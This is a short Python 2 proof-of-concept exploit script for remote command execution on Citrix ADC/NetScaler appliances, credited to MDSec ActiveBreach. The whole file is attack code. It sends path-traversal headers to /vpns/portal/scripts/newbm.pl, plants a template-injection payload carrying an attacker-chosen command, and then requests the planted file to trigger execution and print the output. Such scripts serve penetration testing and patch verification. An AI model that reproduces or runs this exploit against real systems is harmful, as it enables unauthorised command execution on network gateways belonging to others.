Citrix ADC / NetScaler Remote Command Execution

netscaler_exploit.py

import requests
import sys
import time

append_value = str(time.time())

print "# By 0x09AL - MDSec ActiveBreach \n"

def upload_file(url,payload):
	endpoint = url + "/vpns/portal/scripts/newbm.pl"
	template = "[% template.new('BLOCK'='print `{CMD}`') %]".replace("{CMD}",payload)
	data = {'url': 'hello.com', 'title': 'ohno', 'desc': template, 'UI_inuse': 'RfWeb'}
	headers = {'NSC_USER':'../../../../../../netscaler/portal/templates/HELLO'+append_value,'NSC_NONCE':'nsroot'}
	r = requests.post(endpoint,data=data, headers=headers)
#	print r.text
#	print endpoint

def trigger(url):
	trigger_url = url + "/vpns/portal/HELLO" + append_value + ".xml"
	headers = {'NSC_USER':'nsroot','NSC_NONCE':'nsroot'}
	r = requests.get(trigger_url, headers=headers)
	print r.text



if(len(sys.argv)>2):
	url = sys.argv[1]
	command = sys.argv[2]
	print "[+] Sending exploit to: "+ url + " [+]"
	upload_file(url,command)
	trigger(url)
else:
	print "Not enough parameters passed."
	print "python exploit.py URL COMMAND"